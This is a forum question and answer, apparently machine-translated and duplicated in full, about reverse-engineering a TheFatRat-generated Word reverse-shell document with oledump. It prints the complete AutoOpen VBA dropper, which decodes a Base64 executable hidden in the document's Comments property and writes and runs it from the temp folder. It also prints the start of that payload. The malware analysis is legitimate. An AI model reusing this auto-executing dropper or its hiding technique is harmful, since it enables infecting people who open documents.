TheFatRat Microsoft reverse shell 文档中的 Base64 代码在哪里?
Where is Base64 code in TheFatRat Microsoft reverse shell document?
我用 TheFatRat 创建了一个反向 shell Microsoft Word 文档,它主要创建反向 shells!
现在,我想对其进行逆向工程,所以我提出了 REMNUX(Ubuntu 和一些逆向工程工具)。
我使用了 oledump.py 并且输出是:
remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
A3 部分有这些宏:
remnux@remnux:~$ oledump.py kjbk.docm -v(解压缩) -s A3
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
它显然解码了一些 Base64 代码和 运行 它,问题是,我在任何这些 A1 上的这个文件上找不到任何 Base64(反向 shell 代码)... A6零件。那么反向 shell 代码在哪里?
我已经将文件上传到这些位置,密码是 123,它创建反向 shell 到本地网络 (192.168....) 所以它是无害的。
让我们在忘记之前回答它,我敢打赌 TheFatRat 开发人员对此分析不满意,但我找到了反向 shell 代码。
与 Emotet 恶意软件不同,Base64 代码无法被 oledump(仅查看受感染文档的 word 目录)等工具检测到,并且它不会隐藏在主文档 XML 文件中,我确实打开了带有 Ubuntu Archive Manager 和 voilà 的 Microsoft Word 文件:
可执行文件隐藏在docProps目录中!它是 Base64,它包含反向 shell 代码!它将复制到 Windows 临时文件夹。
它的第一行:
<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA
我用 TheFatRat 创建了一个反向 shell Microsoft Word 文档,它主要创建反向 shells!
现在,我想对其进行逆向工程,所以我提出了 REMNUX(Ubuntu 和一些逆向工程工具)。
我使用了 oledump.py 并且输出是:
remnux@remnux:~$ oledump.py kjbk.docm
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
A3 部分有这些宏:
remnux@remnux:~$ oledump.py kjbk.docm -v(解压缩) -s A3
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
它显然解码了一些 Base64 代码和 运行 它,问题是,我在任何这些 A1 上的这个文件上找不到任何 Base64(反向 shell 代码)... A6零件。那么反向 shell 代码在哪里?
我已经将文件上传到这些位置,密码是 123,它创建反向 shell 到本地网络 (192.168....) 所以它是无害的。
让我们在忘记之前回答它,我敢打赌 TheFatRat 开发人员对此分析不满意,但我找到了反向 shell 代码。
与 Emotet 恶意软件不同,Base64 代码无法被 oledump(仅查看受感染文档的 word 目录)等工具检测到,并且它不会隐藏在主文档 XML 文件中,我确实打开了带有 Ubuntu Archive Manager 和 voilà 的 Microsoft Word 文件:
可执行文件隐藏在docProps目录中!它是 Base64,它包含反向 shell 代码!它将复制到 Windows 临时文件夹。
它的第一行:
<cp:coreProperties>
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAA